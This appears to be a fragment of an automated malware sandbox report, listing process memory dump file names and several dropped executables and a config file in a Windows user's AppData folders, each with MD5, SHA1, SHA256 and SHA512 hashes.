memory/2524-16-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-17-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-14-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-19-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-20-0x0000000075B90000-0x0000000075BE2000-memory.dmp

memory/2524-21-0x0000000000402000-0x00000000005CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

MD5 322d23bc1ee34b9abe2c992274ae417f
SHA1 aad310f27146cea18660a7d248ee9a3d5ae3fe87
SHA256 f93548cecd2f003c0b6cc6a87b8095b214919db50e888b00f3c2c0ac43546426
SHA512 221d75a9e470097a78fd39f5776939f9a9fafb901191d04be813a57ded5d1f6425724a19cb4479778362cd4318ae61e19611479c4d5af3778c6424eb6cad4d0f

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

MD5 35fadb783458c2c49f06ac6991362ec1
SHA1 5d8a08ddf30df09f90613a5998b6106166ae81f5
SHA256 56141544ac6d03565909b3043fab104bf40cadb32d53a12d821e1328bc50f087
SHA512 abf028a19f1078f41c76eb0b5bc389c4d94f784c497436691e1933a87919fa7589945437fa95a656770ccd29aec328ab5349c6fc7dfd8731fc4c927538f6921f

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\config.json

MD5 724373fdc80811cf935575305dabc412
SHA1 720c6b63d13008eb165d586f62297350d70a42a9
SHA256 4acd1300efefc1f61daddbc62583af929b0d490af812c7dce3358cc10d6f930f
SHA512 470a18006057379b8d7af91c2884534df04f5a82c499881f6d59b639ea29ee1b14e3714ab60c90c6b9dcbdc9ef59abdc24f7eec359e9253bb42cf1488f2826bd

memory/3180-31-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-32-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-33-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-36-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-37-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-38-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-39-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-40-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-41-0x0000000000400000-0x000000000050D000-memory.dmp